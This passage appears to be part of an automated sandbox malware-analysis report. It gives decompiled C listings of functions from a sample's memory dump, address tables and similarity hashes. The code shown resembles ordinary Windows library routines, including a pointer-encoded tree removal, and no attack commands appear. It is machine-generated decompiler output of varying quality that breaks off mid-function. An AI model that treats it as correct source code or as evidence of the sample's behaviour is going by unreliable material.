						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                            0x00b33893
                            0x00b33896
                            0x00b33899
                            0x00b3389f
                            0x00b338a0
                            0x00b338a4
                            0x00b338a9
                            0x00b338ac
                            0x00b338ad
                            0x00b338ae
                            0x00b338af
                            0x00b338b1
                            0x00b338b4
                            0x00b338bb
                            0x00b338bc
                            0x00b338bd
                            0x00b338c4
                            0x00b338c8
                            0x00b338ca
                            0x00b338ca
                            0x00b338d5
                            0x00b3393e
                            0x00b33940
                            0x00b33942
                            0x00b33952
                            0x00b33954
                            0x00b33961
                            0x00b33961
                            0x00b33967
                            0x00b3396e
                            0x00b3396e
                            0x00b33947
                            0x00b3394c
                            0x00000000
                            0x00b3394c
                            0x00b338ea
                            0x00b338ee
                            0x00b338f8
                            0x00b338f9
                            0x00b338ff
                            0x00b33900
                            0x00b33902
                            0x00b33903
                            0x00b3390b
                            0x00b3390f
                            0x00b33950
                            0x00000000
                            0x00b33950
                            0x00b33915
                            0x00b3391d
                            0x00b3391d
                            0x00b33922
                            0x00b33926
                            0x00000000
                            0x00b33928
                            0x00b3392b
                            0x00b3392b
                            0x00b33935
                            0x00b33937
                            0x00b33937
                            0x00000000
                            0x00b33935
                            0x00b33926
                            0x00b338f0
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryName
                            • API String ID: 0-215506332
                            • Opcode ID: 5cad3088374430b1c3fafd93846d20729f27b453f468326974724a02078c884f
                            • Instruction ID: b957ae00f22ccea22e1ea79bdd4fb45d1f81537bff84e62ce1363f21a131ad53
                            • Opcode Fuzzy Hash: 5cad3088374430b1c3fafd93846d20729f27b453f468326974724a02078c884f
                            • Instruction Fuzzy Hash: D631B472901519FFEB15DA58C985E7BF7F4EB80B20F2182A9B916A7250D7709F40C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AED294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                            Download Yara Rule
                            C-Code - Quality: 33%
                            			E00AED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xbad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00AD4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L00AFB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00AF98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00AF95D0();
					L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                            0x00aed29c
                            0x00aed2a6
                            0x00aed2b1
                            0x00aed2b5
                            0x00aed2b6
                            0x00aed2bc
                            0x00aed2bd
                            0x00aed2be
                            0x00aed2bf
                            0x00aed2c2
                            0x00aed2c4
                            0x00aed2cc
                            0x00aed384
                            0x00aed34b
                            0x00aed34f
                            0x00aed350
                            0x00aed351
                            0x00aed35c
                            0x00aed35c
                            0x00aed2d6
                            0x00aed2da
                            0x00aed2e1
                            0x00aed361
                            0x00aed369
                            0x00aed36d
                            0x00aed2e3
                            0x00aed2e3
                            0x00aed2e3
                            0x00aed2e5
                            0x00aed2ed
                            0x00aed2f5
                            0x00aed2fa
                            0x00aed302
                            0x00aed303
                            0x00aed30b
                            0x00aed30f
                            0x00aed313
                            0x00aed318
                            0x00aed31c
                            0x00aed320
                            0x00aed379
                            0x00aed37d
                            0x00000000
                            0x00000000
                            0x00b2affe
                            0x00b2b001
                            0x00b2b011
                            0x00000000
                            0x00aed322
                            0x00aed322
                            0x00aed330
                            0x00aed337
                            0x00aed35d
                            0x00aed339
                            0x00aed33f
                            0x00aed38c
                            0x00aed38c
                            0x00aed33f
                            0x00aed349
                            0x00000000
                            0x00aed349

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: f1e1c2f7c5b49ffc73fa04aaa088b4c43539b0e1af1c443dddd5c0b177ec682a
                            • Instruction ID: 4b3ec194968bfb289daa2668b1fc4608cfa7fe550041c8d39a1c7103b3cd58ac
                            • Opcode Fuzzy Hash: f1e1c2f7c5b49ffc73fa04aaa088b4c43539b0e1af1c443dddd5c0b177ec682a
                            • Instruction Fuzzy Hash: C931ADB55083469FC321DF29C981AABBBE8EB89754F10092EF995D7250E734DD08CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00AC1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						L00AFBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00AFA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00AFA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00AD4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                            0x00ac1b8f
                            0x00ac1b9a
                            0x00ac1b9c
                            0x00ac1b9e
                            0x00ac1ba3
                            0x00b17010
                            0x00b17010
                            0x00000000
                            0x00ac1ba9
                            0x00ac1ba9
                            0x00ac1bae
                            0x00000000
                            0x00ac1bc5
                            0x00ac1bca
                            0x00ac1bcf
                            0x00ac1bd0
                            0x00ac1bd1
                            0x00ac1bd2
                            0x00ac1bd6
                            0x00ac1bdc
                            0x00ac1be0
                            0x00b16ffc
                            0x00b17000
                            0x00000000
                            0x00b17006
                            0x00b17009
                            0x00b17009
                            0x00ac1be6
                            0x00ac1bec
                            0x00ac1c0b
                            0x00ac1c0b
                            0x00ac1c0c
                            0x00ac1c11
                            0x00ac1c12
                            0x00ac1c15
                            0x00ac1c1b
                            0x00ac1c1f
                            0x00ac1c31
                            0x00ac1c33
                            0x00b17026
                            0x00b17026
                            0x00ac1c21
                            0x00ac1c24
                            0x00ac1c24
                            0x00ac1bee
                            0x00ac1bee
                            0x00ac1bf2
                            0x00ac1c3a
                            0x00ac1bf4
                            0x00ac1bf4
                            0x00ac1c05
                            0x00ac1c05
                            0x00ac1c09
                            0x00ac1c3e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ac1c09
                            0x00ac1bec
                            0x00ac1be0
                            0x00ac1bae
                            0x00ac1c2e

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: WindowsExcludedProcs
                            • API String ID: 0-3583428290
                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction ID: b7f46603ff284810a7683da5dde5c13fd970156e7b6d13df95822630cb092ff2
                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction Fuzzy Hash: 5721F577784228ABCB21DB99C984FABB7BDEF46750F164469F9048B202DA34DD0197A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ABF900, Relevance: .9, Instructions: 863COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 99%
                            			E00ABF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
